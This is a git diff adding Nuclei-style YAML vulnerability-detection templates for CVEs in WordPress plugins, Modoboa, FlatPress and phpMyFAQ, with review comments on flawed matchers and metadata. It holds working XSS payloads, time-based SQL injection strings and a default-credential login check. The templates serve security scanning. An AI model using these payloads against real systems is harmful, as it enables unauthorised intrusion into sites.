application/octet-stream + + + -----------------------------34025600472463336623659912061 + Content-Disposition: form-data; name="attnam1" + + + -----------------------------34025600472463336623659912061 + Content-Disposition: form-data; name="atttmp1" + + + -----------------------------34025600472463336623659912061-- 
+ + host-redirects: true + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body_3 + words: + - '
' + - 'clients/listclients.php?' + condition: and + + - type: word + part: header_3 + words: + - text/html + + extractors: + - type: regex + name: csrf + group: 1 + regex: + - 'name="csrfToken" value="([0-9a-zA-Z]+)"' + internal: true diff --git a/http/cves/2022/CVE-2022-45365.yaml b/http/cves/2022/CVE-2022-45365.yaml new file mode 100644 index 0000000000..b841b5e34b --- /dev/null +++ b/http/cves/2022/CVE-2022-45365.yaml 
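Review bot: The third request stores a client record whose `cn` field carries the XSS payload (the `{{randstr}}` prefix reads as a marker) and nothing removes it afterwards, so every scan leaves a persistent script injection in the target's client list for other users to trigger. Either append a request that deletes the created client, or state in the description that the check is stored and not cleaned up so operators can exclude it; at minimum add `# creates a client named {{randstr}}<payload>; not cleaned up` above the POST. The rendering here appears to have dropped the `<script>` portion on the `cn` line and in the `words` matcher, so the text as shown should not be taken as the template's actual content.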
@@ -0,0 +1,51 @@ +id: CVE-2022-45365 + +info: + name: Stock Ticker <= 3.23.2 - Cross-Site-Scripting + author: theamanrawat + severity: medium + description: | + The Stock Ticker plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in the ajax_stockticker_symbol_search_test function in versions up to, and including, 3.23.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/stock-ticker/stock-ticker-3232-reflected-cross-site-scripting-in-ajax-stockticker-symbol-search-test + - https://patchstack.com/database/vulnerability/stock-ticker/wordpress-stock-ticker-plugin-3-23-2-reflected-cross-site-scripting-xss-vulnerability + - https://wordpress.org/plugins/stock-ticker/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-45365 + remediation: Fixed in version 3.23.3 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-45365 + cwe-id: CWE-79 + metadata: + verified: "true" + publicwww-query: "/wp-content/plugins/stock-ticker/" + max-request: 1 + tags: cve,cve2022,wordpress,wp-plugin,wpscan,wp,stock-ticker,unauth,xss + +http: + - raw: + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + action=stockticker_symbol_search_test&symbol=test&endpoint=%3Cimg+src%3Dx+onerror%3D%26%23x61%3B%26%23x6c%3B%26%23x65%3B%26%23x72%3B%26%23x74%3B%28document.domain%29%3E + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Stock Ticker Fatal" + - "")' + condition: and diff --git a/http/cves/2023/CVE-2023-0600.yaml b/http/cves/2023/CVE-2023-0600.yaml new file mode 100644 index 0000000000..17249a99f1 --- /dev/null 
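Review bot: `tags` carries `wpscan` although none of the references is a wpscan advisory (Wordfence, Patchstack and NVD are cited), and `verified: "true"` is a quoted string where the sibling templates use the boolean; both mislead anyone filtering the corpus by tag or by metadata type. Change to `tags: cve,cve2022,wordpress,wp-plugin,wp,stock-ticker,unauth,xss` and `verified: true`. The `words` list looks truncated in this rendering (`- "")'`), so the second word should be checked against the committed file.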
+++ b/http/cves/2023/CVE-2023-0600.yaml @@ -0,0 +1,40 @@ +id: CVE-2023-0600 + +info: + name: WP Visitor Statistics (Real Time Traffic) < 6.9 - SQL Injection + author: r3Y3r53 + severity: high + description: | + The plugin does not escape user input which is concatenated to an SQL query, allowing unauthenticated visitors to conduct SQL Injection attacks. + remediation: Fixed in version 6.9 + reference: + - https://wpscan.com/vulnerability/8f46df4d-cb80-4d66-846f-85faf2ea0ec4 + - https://nvd.nist.gov/vuln/detail/CVE-2023-0600 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-0600 + cwe-id: CWE-89 + metadata: + max-request: 1 + verified: true + public-www: "/wp-content/plugins/wp-stats-manager/" + tags: cve,cve2023,wp,wp-plugin,wordpress,wpscan,unauth,wp-stats-manager,sqli + +variables: + str: '{{rand_int(100000, 999999)}}' + +http: + - raw: + - | + @timeout: 30s + GET /?wmcAction=wmcTrack&siteId=34&url=test&uid=01&pid=02&visitorId={{str}}%27,sleep(6),0,0,0,0,0);--+- HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'status_code == 200' + - 'contains(body, "sleep(10)")' + condition: and diff --git a/http/cves/2023/CVE-2023-0602.yaml b/http/cves/2023/CVE-2023-0602.yaml new file mode 100644 index 0000000000..0d552523db --- /dev/null +++ b/http/cves/2023/CVE-2023-0602.yaml 
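Review bot: The matcher requires `contains(body, "sleep(10)")` while the request injects `sleep(6)`; unless the page statically prints that string, the body condition can never hold and the template will not fire even when the six-second delay is observed. Use `contains(body, "sleep(6)")` or, better, drop the body check and rely on `duration>=6` with `status_code == 200`, since the reflected query text is incidental. `public-www:` should be `publicwww-query:` to match the key name every other template in this set uses.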
@@ -0,0 +1,37 @@ +id: CVE-2023-0602 +info: + name: Twittee Text Tweet <= 1.0.8 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + The Twittee Text Tweet WordPress plugin through 1.0.8 does not properly escape POST values which are printed back to the user inside one of the plugin's administrative page, which allows reflected XSS attacks targeting administrators to happen. + reference: + - https://wpscan.com/vulnerability/c357f93d-4f21-4cd9-9378-d97756c75255 + - https://nvd.nist.gov/vuln/detail/CVE-2023-0602 + - https://wordpress.org/plugins/twittee-text-tweet/ + metadata: + verified: true + max-request: 2 + tags: cve,cve2023,wpscan,xss,wordpress,wp,wp-plugin,twittee-text-tweet + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=asc&orderby=file-438&field&time&start_date&end_date=onobw%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3ez2u4g HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, "") && contains(body_2, "twittee")' + condition: and diff --git a/http/cves/2023/CVE-2023-0777.yaml b/http/cves/2023/CVE-2023-0777.yaml new file mode 100644 index 0000000000..56977d2b0a --- /dev/null +++ b/http/cves/2023/CVE-2023-0777.yaml 
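Review bot: Request 2 is a GET to `admin.php?page=vxcf_leads&form_id=cf_5&...&orderby=file-438...`, which names the Contact Form Entries admin page rather than anything belonging to Twittee Text Tweet, while the description says the bug is in POST values printed back on the plugin's own page; the only link to the plugin is `contains(body_2, "twittee")`, which the admin menu satisfies on any site with the plugin active. Confirm the endpoint and method against the wpscan reference, and if it is a copy-paste from another template, replace request 2 with a POST to the plugin's admin page carrying the payload in the vulnerable field. Adding the `classification` block (CVSS vector, `cve-id`, `cwe-id`) would bring this file in line with its siblings.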
@@ -0,0 +1,66 @@ +id: CVE-2023-0777 + +info: + name: modoboa 2.0.4 - Admin TakeOver + author: r3Y3r53 + severity: critical + description: | + Authentication Bypass by Primary Weakness in GitHub repository modoboa/modoboa prior to 2.0.4. + remediation: update to version 2.0.4 + reference: + - https://huntr.dev/bounties/a17e7a9f-0fee-4130-a522-5a0466fc17c7/ + - http://packetstormsecurity.com/files/171744/modoboa-2.0.4-Admin-Takeover.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-0777 + cwe-id: CWE-305 + cpe: cpe:2.3:a:modoboa:modoboa:*:*:*:*:*:*:*:* + metadata: + verified: true + shodan-query: html:"Modoboa" + fofa-query: body="Modoboa" + tags: modoboa,default-login + +http: + - raw: + - | + GET /accounts/login/ HTTP/1.1 + Host: {{Hostname}} + + - | + POST /accounts/login/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + csrfmiddlewaretoken={{csrftoken}}&username={{username}}&password={{password}}&next=%2F + + - | + GET /dashboard/ HTTP/1.1 + Host: {{Hostname}} + + payloads: + username: + - admin + password: + - password + attack: pitchfork + + cookie-reuse: true + host-redirects: true + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "Dashboard") && contains(body_3, "Hello admin")' + condition: and + + extractors: + - type: regex + part: header + name: csrftoken + internal: true + group: 1 + regex: + - csrftoken=([A-Za-z0-9]+) diff --git a/http/cves/2023/CVE-2023-0900.yaml b/http/cves/2023/CVE-2023-0900.yaml new file mode 100644 index 0000000000..a58ed6e23b --- /dev/null +++ b/http/cves/2023/CVE-2023-0900.yaml 
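Review bot: `tags: modoboa,default-login` omits `cve,cve2023` although this is a CVE template, and `max-request: 3` is missing from `metadata`; both are what the rest of this set rely on for selection. What the template actually does is log in with `admin`/`password` and look for `Hello admin` on the dashboard, i.e. a default-credential check, which the description's "Authentication Bypass by Primary Weakness" does not convey; a sentence in the description saying the check logs in with those credentials would justify the `default-login` tag. Extracting `csrftoken` from the response header only works because the token is set as a cookie, so a comment `# csrftoken is issued as a cookie, not in the form body` above the extractor would help readers.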
@@ -0,0 +1,63 @@ +id: CVE-2023-0900 + +info: + name: AP Pricing Tables Lite <= 1.1.6 - SQL Injection + author: r3Y3r53 + severity: high + description: | + The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high-privilege users such as admins. + reference: + - https://wpscan.com/vulnerability/f601e637-a486-4f3a-9077-4f294ace7ea1 + - https://github.com/WPPlugins/ap-pricing-tables-lite + - https://nvd.nist.gov/vuln/detail/CVE-2023-0900 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2023-0900 + cwe-id: CWE-89 + metadata: + max-request: 3 + verified: true + publicwww-query: "wp-content/plugins/ap-pricing-tables-lite" + tags: cve,cve2023,sqli,wordpress,wp-plugin,wp,authenticated,wpscan,ap-pricing-tables-lite + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/admin.php?page=ap-pricing-tables-lite&message=1 HTTP/1.1 + Host: {{Hostname}} + + - | + @timeout: 20s + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + X-Requested-With: XMLHttpRequest + Content-Type: application/x-www-form-urlencoded + + action=backend_ajax&_action=copy_table&table_id=1+AND+(SELECT+2035+FROM+(SELECT(SLEEP(10)))A)&_wpnonce={{nonce}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'duration_3>=5' + - 'status_code_3 == 200' + - 'contains(body_3, "Security check")' + - 'contains(body_2, "ap-pricing-tables-lite")' + condition: and + + extractors: + - type: regex + name: nonce + part: body + group: 1 + regex: + - '_wpnonce=([0-9a-z]+)">Log Out' + internal: true diff --git a/http/cves/2023/CVE-2023-0947.yaml b/http/cves/2023/CVE-2023-0947.yaml new file mode 100644 index 0000000000..803eb839f2 --- /dev/null +++ b/http/cves/2023/CVE-2023-0947.yaml 
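Review bot: The injected `SLEEP(10)` is paired with `duration_3>=5`, so a host that is merely slow trips the matcher at half the injected delay; align the threshold with the payload (`duration_3>=10`) or lower the sleep to match. The matcher also expects `Security check`, WordPress's failed-nonce message — the `_wpnonce` extracted from the `Log Out` link is the logout nonce, not the plugin's AJAX nonce, so the template appears to rely on the query executing before the nonce is verified; a comment above the POST saying `# nonce is rejected but the query runs first; the delay is the signal` would stop the next maintainer from "fixing" the extractor. The CVSS vector says `PR:N` while the description says admins only and the score is 8.8; one of the three should change.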
@@ -0,0 +1,34 @@ +id: CVE-2023-0947 + +info: + name: Flatpress < 1.3 - Path Traversal + author: r3Y3r53 + severity: critical + description: | + Path Traversal in GitHub repository flatpressblog/flatpress prior to 1.3. + reference: + - https://huntr.dev/bounties/7379d702-72ff-4a5d-bc68-007290015496/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-0947 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-0947 + cwe-id: CWE-22 + metadata: + verified: true + shodan-query: http.favicon.hash:-1189292869 + tags: cve,cve2023,lfi,flatpress,listing + +http: + - method: GET + path: + - "{{BaseURL}}/fp-content/" + - "{{BaseURL}}/flatpress/fp-content/" + + stop-at-first-match: true + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(body, "Index of /fp-content")' + condition: and diff --git a/http/cves/2023/CVE-2023-1263.yaml b/http/cves/2023/CVE-2023-1263.yaml new file mode 100644 index 0000000000..2b5af9b7ec --- /dev/null +++ b/http/cves/2023/CVE-2023-1263.yaml 
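Review bot: The check only looks for `Index of /fp-content` on `/fp-content/`, which is directory-listing exposure, not the path traversal the CVE describes; a patched install with listing enabled matches and an unpatched one with listing disabled does not. Tie the probe to the traversal documented in the huntr reference, or rename and describe the template as a listing check and drop `critical`, since the 9.8 score belongs to the traversal. `max-request: 2` is missing from `metadata`.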
@@ -0,0 +1,52 @@ +id: CVE-2023-1263 + +info: + name: Coming Soon & Maintenance < 4.1.7 - Unauthenticated Post/Page Access + author: r3Y3r53 + severity: medium + description: | + The plugin does not restrict access to published and non protected posts/pages when the maintenance mode is enabled, allowing unauthenticated users to access them. + reference: + - https://wpscan.com/vulnerability/2e07ffd9-8e82-4078-96aa-162ef78c417b + - https://nvd.nist.gov/vuln/detail/CVE-2023-1263 + - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cmp-coming-soon-maintenance/cmp-coming-soon-maintenance-plugin-by-niteothemes-416-information-exposure + - https://wordpress.org/plugins/cmp-coming-soon-maintenance/ + remediation: Fixed in version 4.1.7 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2023-1263 + cwe-id: CWE-862 + metadata: + max-request: 1 + verified: true + publicwww-query: "/wp-content/plugins/cmp-coming-soon-maintenance/" + tags: cve,cve2023,wordpress,wpscan,wp-plugin,wp,cmp-coming-soon-maintenance,unauth + +http: + - raw: + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + action=cmp_get_post_detail&id=1 + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"img":' + - '"date":' + - '"title":' + condition: and + + - type: word + part: header + words: + - application/json + + - type: status + status: + - 200 diff --git a/http/cves/2023/CVE-2023-1408.yaml b/http/cves/2023/CVE-2023-1408.yaml new file mode 100644 index 0000000000..dd0ee485e0 --- /dev/null +++ b/http/cves/2023/CVE-2023-1408.yaml 
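Review bot: The condition fires whenever `cmp_get_post_detail&id=1` returns JSON with `img`, `date` and `title`, which a site with maintenance mode switched off may also do, yet the description scopes the issue to access while maintenance mode is enabled; expect false positives on any site with the plugin active unless a test instance confirms the fixed version refuses the call outright. If it does not, add a request that confirms maintenance mode is on and AND it into the matchers. A comment `# only a leak when maintenance mode is enabled; confirm before reporting` above the POST would keep the caveat visible either way.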
@@ -0,0 +1,46 @@ +id: CVE-2023-1408 + +info: + name: Video List Manager <= 1.7 - SQL Injection + author: r3Y3r53 + severity: critical + description: | + The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin. + reference: + - https://wpscan.com/vulnerability/baf7ef4d-b2ba-48e0-9c17-74fa27e0c15b + - https://wordpress.org/plugins/video-list-manager/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-1408 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2023-1408 + cwe-id: CWE-89 + metadata: + verified: true + publicwww-query: "/wp-content/plugins/video-list-manager/" + max-request: 1 + tags: cve,cve2023,sqli,wordpress,wp-plugin,wp,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + @timeout: 15s + GET /wp-admin/admin.php?page=tnt_video_edit_page&videoID=SLEEP(7) HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + redirects: true + matchers: + - type: dsl + dsl: + - 'duration_2>=7' + - 'status_code_2 == 200' + - 'contains_all(body_2, "Edit Video","Youtube")' + condition: and diff --git a/http/cves/2023/CVE-2023-1780.yaml b/http/cves/2023/CVE-2023-1780.yaml new file mode 100644 index 0000000000..23d41c6a5b --- /dev/null +++ b/http/cves/2023/CVE-2023-1780.yaml 
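Review bot: `max-request: 1` undercounts the two-request sequence, and the CVSS vector `PR:N` contradicts both the description (admin only) and the 8.8 score; `PR:H` with a matching score would be consistent. `redirects: true` lets an unauthenticated bounce to `wp-login.php` land as a 200, but `contains_all(body_2, "Edit Video","Youtube")` should still exclude that, so no change is needed there. Tags lack the plugin slug `video-list-manager` and `wpscan`, which the sibling templates include.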
@@ -0,0 +1,45 @@ +id: CVE-2023-1780 + +info: + name: Companion Sitemap Generator < 4.5.3 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + The plugin does not sanitise and escape some parameters before outputting them back in pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin. + remediation: Fixed in version 4.5.3 + reference: + - https://wpscan.com/vulnerability/8176308f-f210-4109-9c88-9372415dbed3 + - https://nvd.nist.gov/vuln/detail/CVE-2023-1780 + classification: + cve-id: CVE-2023-1780 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cwe-id: CWE-79 + metadata: + max-request: 2 + verified: true + publicwww-query: "/wp-content/plugins/companion-sitemap-generator/" + tags: cve,cve2023,wpscan,wp,wordpress,wp-scan,xss,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/tools.php?page=csg-sitemap&tabbed=%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(content_type_2, "text/html")' + - 'contains(body_2, "re not allowed to view")' + - 'contains(body_2, "")' + condition: and diff --git a/http/cves/2023/CVE-2023-1880.yaml b/http/cves/2023/CVE-2023-1880.yaml new file mode 100644 index 0000000000..8b3c332aa6 --- /dev/null +++ b/http/cves/2023/CVE-2023-1880.yaml 
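Review bot: `tags` contains both `wpscan` and `wp-scan`; the second is a typo that no tag filter will ever match, so drop it. The template logs in first and is tagged `authenticated` while the vector is `PR:N`, which is fine for reflected XSS aimed at an admin, but the description should say that credentials are needed to verify it. The `contains(body_2, "")` condition looks truncated in this rendering and should be checked against the committed file.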
@@ -0,0 +1,35 @@ +id: CVE-2023-1880 + +info: + name: Phpmyfaq v3.1.11 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Phpmyfaq v3.1.11 is vulnerable to reflected XSS in send2friend because the 'artlang' parameter is not sanitized. + remediation: Fixed in 3.1.12 Version. + reference: + - https://huntr.dev/bounties/ece5f051-674e-4919-b998-594714910f9e + - https://nvd.nist.gov/vuln/detail/CVE-2023-1880 + - https://github.com/thorsten/phpmyfaq/commit/bbc5d4aa4a4375c14e34dd9fcad2042066fe476d + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cwe-id: CWE-79 + metadata: + max-request: 1 + verified: true + shodan-query: http.html:"phpmyfaq" + tags: cve,cve2023,xss,phpmyfaq + +http: + - method: GET + path: + - "{{BaseURL}}/?action=send2friend&artlang=aaaa%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(body, "phpmyfaq") && contains(body, "")' + - 'contains(content_type, "text/html")' + condition: and diff --git a/http/cves/2023/CVE-2023-2009.yaml b/http/cves/2023/CVE-2023-2009.yaml new file mode 100644 index 0000000000..76577c6b60 --- /dev/null +++ b/http/cves/2023/CVE-2023-2009.yaml 
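Review bot: The `classification` block has no `cve-id: CVE-2023-1880`, unlike the other templates in this set, so tooling that reads the CVE from classification will miss it. The reflected-XSS assertion `contains(body, "")` appears truncated in this rendering; the committed file presumably checks for the `<script>` payload and should be verified.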
@@ -0,0 +1,56 @@ +id: CVE-2023-2009 + +info: + name: Pretty Url <= 1.5.4 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Plugin does not sanitize and escape the URL field in the plugin settings, which could allow high-privilege users to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). + reference: + - https://wpscan.com/vulnerability/f7988a18-ba9d-4ead-82c8-30ea8223846f + - https://nvd.nist.gov/vuln/detail/CVE-2023-2009 + - https://wordpress.org/plugins/pretty-url/ + metadata: + verified: true + max-request: 3 + tags: cve,cve2023,wordpress,wpscan,wp-plugin,wp,authenticated,pretty-url,xss + + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log=((username))&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/admin.php?page=prettyurls HTTP/1.1 + Host: {{Hostname}} + + - | + POST /wp-admin/admin.php?page=prettyurls HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + _wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dprettyurls&id=&category=accordions%7Epost_type&url=%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&meta_title=&meta_description=&meta_keyword= + + redirects: true + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(body_3, "")' + - 'contains(body_3, "prettyurls")' + condition: and + + extractors: + - type: regex + internal: true + name: nonce + part: body + group: 1 + regex: + - 'name="_wpnonce" value="([0-9a-z]+)" />' \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2779.yaml b/http/cves/2023/CVE-2023-2779.yaml new file mode 100644 index 0000000000..8f8ad9e220 --- /dev/null +++ b/http/cves/2023/CVE-2023-2779.yaml 
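Review bot: The login body uses `log=((username))` instead of `log={{username}}`, so the literal string `((username))` is posted as the username, the login fails, and requests 2 and 3 run without a session — the template cannot produce a positive result as written. Change the line to `log={{username}}&pwd={{password}}&wp-submit=Log+In`. Request 3 also writes the payload into the plugin's URL settings and nothing removes it, so the description should say the check is stored and not cleaned up; the `classification` block is missing and the file lacks a trailing newline.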
@@ -0,0 +1,44 @@ +id: CVE-2023-2779 + +info: + name: Super Socializer < 7.13.52 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin. + remediation: Fixed in version 7.13.52 + reference: + - https://wpscan.com/vulnerability/fe9b7696-3b0e-42e2-9dbc-55167605f5c5 + - https://nvd.nist.gov/vuln/detail/CVE-2023-2779 + - https://wordpress.org/plugins/super-socializer/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cwe-id: CWE-79 + metadata: + verified: true + max-request: 2 + publicwww-query: "/wp-content/plugins/super-socializer/" + tags: cve,cve2023,wpscan,xss,wp,wp-plugin,wordpress,authenticated,super-socializer + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[%3Cimg%20src%3Dx%20onerror%3Dalert%28document%2Edomain%29%3E]=https://oast.pro HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, "") && contains(body_2, "facebook_urls")' + condition: and diff --git a/http/cves/2023/CVE-2023-27922.yaml b/http/cves/2023/CVE-2023-27922.yaml new file mode 100644 index 0000000000..c7a29cad2b --- /dev/null +++ b/http/cves/2023/CVE-2023-27922.yaml 
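Review bot: The reflected parameter is the `urls[...]` array key, but its value is a hard-coded third-party URL (`https://oast.pro`), so every scan makes the target fetch share counts for a domain the operator does not control. Use `{{interactsh-url}}` if a callback is wanted, or a neutral value such as `http://{{Hostname}}`, since the key alone carries the payload and the `facebook_urls` matcher is unaffected. The template logs in first and is tagged `authenticated` while the vector is `PR:N`; a comment on whether `the_champ_sharing_count` is reachable without a session would clarify whether the login step is needed.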
@@ -0,0 +1,39 @@ +id: CVE-2023-27922 + +info: + name: Newsletter < 7.6.9 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + The plugin does not escape generated URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as administrators + reference: + - https://wpscan.com/vulnerability/eb6ff6f0-60fe-4345-b443-97fd4800418c + - https://nvd.nist.gov/vuln/detail/CVE-2023-27922 + metadata: + max-request: 1 + verified: true + publicwww-query: "/wp-content/plugins/newsletter/" + tags: cve,cve2023,wordpress,wp,wp-plugin,xss,newsletter,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/admin.php?page=newsletter_system_status&a%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(body_2, "text/html")' + - 'contains(tolower(body_2), "_newsletter_")' + - 'contains(body_2, ">")' + condition: and diff --git a/http/cves/2023/CVE-2023-29439.yaml b/http/cves/2023/CVE-2023-29439.yaml new file mode 100644 index 0000000000..17242538ee --- /dev/null +++ b/http/cves/2023/CVE-2023-29439.yaml 
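Review bot: `contains(body_2, "text/html")` checks the response body for a content-type string; it should be `contains(header_2, "text/html")` (or `content_type_2`) as in the sibling templates, otherwise the condition only passes when the page happens to print that text. The final condition `contains(body_2, ">")` is too weak to prove reflection and appears truncated in this rendering; match the full injected `<script>alert(document.domain)</script>` sequence. The `classification` block is absent, so the CVSS vector and `cwe-id` are missing.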
@@ -0,0 +1,54 @@ +id: CVE-2023-29439 + +info: + name: FooGallery plugin <= 2.2.35 - Cross-Site Scripting + author: theamanrawat + severity: medium + description: | + Reflected Cross-Site Scripting (XSS) vulnerability in FooPlugins FooGallery plugin <= 2.2.35 versions. + reference: + - https://lourcode.kr/posts/CVE-2023-29439-Analysis?_s_id=cve + - https://wordpress.org/plugins/foogallery/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-29439 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-29439 + cwe-id: CWE-79 + metadata: + verified: "true" + publicwww-query: "/wp-content/plugins/foogallery/" + max-request: 2 + tags: cve,cve2023,xss,wordpress,wp-plugin,wp,foogallery,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/post-new.php?post_type=foogallery&post=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'data-gallery_id="\">"' + - 'foogallery-image-edit-modal' + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 diff --git a/http/cves/2023/CVE-2023-30868.yaml b/http/cves/2023/CVE-2023-30868.yaml new file mode 100644 index 0000000000..df9825d672 --- /dev/null +++ b/http/cves/2023/CVE-2023-30868.yaml 
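Review bot: `verified: "true"` is a quoted string where the other templates in this set use the boolean `true`; change it to `verified: true` so the metadata type is consistent. The matcher itself is sound: it requires the reflected `data-gallery_id="\">` fragment together with the plugin's `foogallery-image-edit-modal` marker and a 200 HTML response.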
